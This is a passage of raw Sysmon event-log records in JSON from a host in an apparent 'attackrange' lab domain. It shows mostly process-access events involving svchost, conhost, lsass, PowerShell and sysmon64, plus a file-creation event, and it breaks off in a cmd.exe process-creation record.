C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1637,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1638,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1639,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.637\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.637","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1640,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.638\r\nSourceProcessGUID: {41C8662E-1F69-5F25-0000-0010BB890200}\r\nSourceProcessId: 3004\r\nSourceThreadId: 3032\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001019510300}\r\nTargetProcessId: 3696\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.638","SourceProcessGUID":"{41C8662E-1F69-5F25-0000-0010BB890200}","SourceProcessId":"3004","SourceThreadId":"3032","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001019510300}","TargetProcessId":"3696","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1641,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001019510300}\r\nTargetProcessId: 3696\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001019510300}","TargetProcessId":"3696","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1642,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.674\r\nProcessGuid: {41C8662E-1F74-5F25-0000-001019510300}\r\nProcessId: 3696\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_qxll3rr5.grk.ps1\r\nCreationUtcTime: 2020-08-01 07:53:24.674","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.674","ProcessGuid":"{41C8662E-1F74-5F25-0000-001019510300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_qxll3rr5.grk.ps1","CreationUtcTime":"2020-08-01 07:53:24.674","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1643,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.705\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001019510300}\r\nTargetProcessId: 3696\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.705","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001019510300}","TargetProcessId":"3696","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1644,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.705\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001019510300}\r\nTargetProcessId: 3696\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.705","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001019510300}","TargetProcessId":"3696","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1645,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.730\r\nProcessGuid: {41C8662E-1F74-5F25-0000-0010E45F0300}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® 